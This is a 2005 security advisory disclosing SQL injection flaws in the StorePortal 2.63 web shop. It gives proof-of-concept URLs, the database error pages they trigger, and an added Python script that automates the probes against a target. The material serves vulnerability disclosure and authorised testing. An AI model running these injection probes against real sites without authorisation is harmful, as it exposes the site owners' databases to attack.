Date: 24 Apr 2005 13:24:14 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL Injections in StorePortal 2.63

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's services to audit your web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005
Vendor: StorePortal
Vendor Website: http://www.storeportal.com/

Summary:
There are multiple SQL injections in StorePortal 2.63. The application sits on a Microsoft Access database reached through the ODBC driver, and its error page echoes the failing query expression back to the browser, which is what makes each injection point easy to confirm: a single quote in the affected parameter is enough to produce the "Syntax error (missing operator)" message with the injected text inside it.

Proof of Concept Exploits:
These SQL injections are caused by the referrer of the pages called, and are only exploitable if you visit them after visiting default.asp. Note that in the first six cases below the echoed query expression is the URL of the page being visited followed by ,'' rather than a product or category lookup, so the quote is reaching a query (apparently request logging, which is what the referrer dependency points at) that embeds that URL by string concatenation. The keyword case (opr=4) is different: there the parameter lands directly inside the LIKE patterns of the search query's WHERE clause, unescaped.

http://localhost/default.asp?language='sqlinjection

SQL INJECTION ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?language='sqlinjection&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?id=1&opr=2&%3bpic='sql_injection_

SQL INJECTION ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?id=1&opr=2&pic='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1

SQL INJECTION ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_

SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_

SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_

SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'IdCategoriaInfo = 1 and Visible = 'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or DataExpire is null or DataExpire = '') and (Name like '%'sql_injection_%' or Body like '%'sql_injection_%')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_

SQL INJECTION ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on secure coding with PHP.
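The following is an added example, not code from the original advisory or from StorePortal: a small Python probe that reproduces the author's check against a test installation. It visits default.asp first (the precondition stated above), then requests each of the seven URLs with a quote in the affected parameter and sorts the response by what the Access ODBC error echoes back, distinguishing the six cases where the echoed expression is the request URL from the keyword case where the parameter lands inside the search query. The base URL, the marker value `'sqli_probe`, the Referer header and the classification names are this example's own assumptions; the parameter names and the error signature are taken from the advisory.

```python
"""Probe the StorePortal 2.63 injection points listed in the advisory.

Added example; host, marker value and result labels are assumptions.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

# Injected value: the single quote is what breaks the concatenated query,
# the suffix only makes the probe recognisable in the echoed expression.
MARKER = "'sqli_probe"

# One dict per advisory URL; the parameter carrying MARKER is the one
# the advisory injects into.  Other values are the advisory's own.
PROBES = [
    {"language": MARKER},
    {"id": "1", "opr": "2", "pic": MARKER},
    {"opr": "35", "id": "1", "idcategory": MARKER, "idcategoryp": "1"},
    {"opr": "35", "id": "1", "idcategory": "1", "idcategoryp": MARKER},
    {"mnu": "", "id": "1", "opr": "5", "content": MARKER},
    {"id": "1", "opr": "4", "keyword": MARKER},
    {"opr": "41", "idcategory": "11", "idcategoryp": "11",
     "id": "1", "idproduct": MARKER},
]

# Error signature shown in the advisory: the Access ODBC error number and
# the "missing operator" message that echoes the failing expression.
ACCESS_ERR = re.compile(r"Error Number=\s*#-2147217900")
MISSING_OP = re.compile(
    r"Syntax error \(missing operator\) in query expression '(.*?)'\.", re.S)


def build_probe_urls(base):
    """Return the seven probe URLs with the quote percent-encoded (%27)."""
    return [base + "/default.asp?" + urllib.parse.urlencode(p) for p in PROBES]


def classify(body):
    """Classify one response body.

    Returns (kind, expr) where expr is the query fragment the error page
    echoes and kind is one of:
      ""               no Access ODBC error in the body
      "access-error"   Access error, but our marker is not in the expression
      "uri-logged"     marker reached a query that embeds the request URL
      "param-in-query" marker reached the search query itself (keyword case)
    """
    if not ACCESS_ERR.search(body):
        return ("", "")
    m = MISSING_OP.search(body)
    expr = m.group(1) if m else ""
    if MARKER.lstrip("'") not in expr:
        return ("access-error", expr)
    if expr.lstrip("'").startswith("/default.asp"):
        return ("uri-logged", expr)
    return ("param-in-query", expr)


def run(base, timeout=10):
    """Visit default.asp, then each probe with Referer set to default.asp.

    Cookies are kept across requests so a session started on default.asp
    survives into the probes.  Returns [(url, (kind, expr)), ...].
    """
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    entry = base + "/default.asp"
    opener.open(entry, timeout=timeout).read()
    results = []
    for url in build_probe_urls(base):
        req = urllib.request.Request(url, headers={"Referer": entry})
        try:
            raw = opener.open(req, timeout=timeout).read()
        except urllib.error.HTTPError as err:  # ASP error pages may be 500s
            raw = err.read()
        results.append((url, classify(raw.decode("latin-1", "replace"))))
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    for url, (kind, expr) in run(target):
        print(f"{kind or 'clean':15} {url}")
        if expr:
            print(f"{'':15} echoed: {expr}")
```

Run it as `python probe.py http://host` against a copy you are authorised to test. A "uri-logged" result on a parameter that the page never uses in a lookup is the tell that the quote is breaking a logging query rather than the page's own query, which matters for impact: the keyword case gives control over the WHERE clause of the search, the logging cases give an error and whatever the logging insert can be made to do.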